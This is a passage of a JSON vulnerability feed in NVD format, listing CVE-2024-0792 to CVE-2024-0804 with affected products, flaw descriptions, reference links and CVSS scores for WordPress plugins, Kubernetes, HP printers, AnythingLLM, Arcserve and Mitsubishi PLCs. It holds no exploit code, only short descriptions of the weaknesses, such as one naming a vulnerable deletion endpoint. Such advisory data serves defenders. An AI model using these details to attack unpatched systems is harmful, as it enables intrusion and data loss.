"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pluginus:wolf_-_wordpress_posts_bulk_editor_and_products_manager_professional:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.8.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0792", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49", "name" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49", "name" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78", "name" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78", "name" : "https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3026377/", "name" : "https://plugins.trac.wordpress.org/changeset/3026377/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3026377/", "name" : "https://plugins.trac.wordpress.org/changeset/3026377/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.0.1 due to insufficient input sanitization and output escaping on RSS feed content. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:getshortcodes:shortcodes_ultimate:*:*:*:*:-:wordpress:*:*", "versionEndExcluding" : "7.0.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-27T17:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0793", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-20" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0741", "name" : "RHSA-2024:0741", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1267", "name" : "RHSA-2024:1267", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0793", "name" : "https://access.redhat.com/security/cve/CVE-2024-0793", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2214402", "name" : "RHBZ#2214402", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/openshift/kubernetes/pull/1876", "name" : "https://github.com/openshift/kubernetes/pull/1876", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in kube-controller-manager. This issue occurs when the initial application of a HPA config YAML lacking a .spec.behavior.scaleUp block causes a denial of service due to KCM pods going into restart churn." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.7, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.1, "impactScore" : 4.0 } }, "publishedDate" : "2024-11-17T11:15Z", "lastModifiedDate" : "2024-11-18T17:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0794", "ASSIGNER" : "hp-security-alert@hp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.hp.com/us-en/document/ish_10174031-10174074-16/", "name" : "https://support.hp.com/us-en/document/ish_10174031-10174074-16/", "refsource" : "", "tags" : [ ] }, { "url" : "https://support.hp.com/us-en/document/ish_10174031-10198670-16", "name" : "https://support.hp.com/us-en/document/ish_10174031-10198670-16", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Certain HP LaserJet Pro, HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to Remote Code Execution due to buffer overflow when rendering fonts embedded in a PDF file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-02-20T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0795", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564", "name" : "https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564", "name" : "https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec", "name" : "https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec", "name" : "https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "If an attacked was given access to an instance with the admin or manager role there is no backend authentication that would prevent the attacked from creating a new user with an `admin` role and then be able to use this new account to have elevated privileges on the instance" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-02T22:15Z", "lastModifiedDate" : "2025-01-21T15:06Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0796", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pluginus:woot:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0797", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pluginus:woot:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2025-05-15T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0798", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733", "name" : "https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733", "name" : "https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c", "name" : "https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c", "name" : "https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A privilege escalation vulnerability exists in mintplex-labs/anything-llm, allowing users with 'default' role to delete documents uploaded by 'admin'. Despite the intended restriction that prevents 'default' role users from deleting admin-uploaded documents, an attacker can exploit this vulnerability by sending a crafted DELETE request to the /api/system/remove-document endpoint. This vulnerability is due to improper access control checks, enabling unauthorized document deletion and potentially leading to loss of data integrity." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-27T03:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0799", "ASSIGNER" : "vulnreport@tenable.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.tenable.com/security/research/tra-2024-07", "name" : "https://www.tenable.com/security/research/tra-2024-07", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.tenable.com/security/research/tra-2024-07", "name" : "https://www.tenable.com/security/research/tra-2024-07", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-13T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0800", "ASSIGNER" : "vulnreport@tenable.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.tenable.com/security/research/tra-2024-07", "name" : "https://www.tenable.com/security/research/tra-2024-07", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.tenable.com/security/research/tra-2024-07", "name" : "https://www.tenable.com/security/research/tra-2024-07", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A path traversal vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-13T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0801", "ASSIGNER" : "vulnreport@tenable.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.tenable.com/security/research/tra-2024-07", "name" : "https://www.tenable.com/security/research/tra-2024-07", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.tenable.com/security/research/tra-2024-07", "name" : "https://www.tenable.com/security/research/tra-2024-07", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-13T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0802", "ASSIGNER" : "Mitsubishielectric.Psirt@yd.MitsubishiElectric.co.jp" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jvn.jp/vu/JVNVU99690199/", "name" : "https://jvn.jp/vu/JVNVU99690199/", "refsource" : "", "tags" : [ ] }, { "url" : "https://jvn.jp/vu/JVNVU99690199/", "name" : "https://jvn.jp/vu/JVNVU99690199/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "name" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "name" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to read arbitrary information from a target product or execute malicious code on a target product by sending a specially crafted packet." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-15T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0803", "ASSIGNER" : "Mitsubishielectric.Psirt@yd.MitsubishiElectric.co.jp" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jvn.jp/vu/JVNVU99690199/", "name" : "https://jvn.jp/vu/JVNVU99690199/", "refsource" : "", "tags" : [ ] }, { "url" : "https://jvn.jp/vu/JVNVU99690199/", "name" : "https://jvn.jp/vu/JVNVU99690199/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "name" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "name" : "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-15T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0804", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1515137", "name" : "https://crbug.com/1515137", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1515137", "name" : "https://crbug.com/1515137", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party 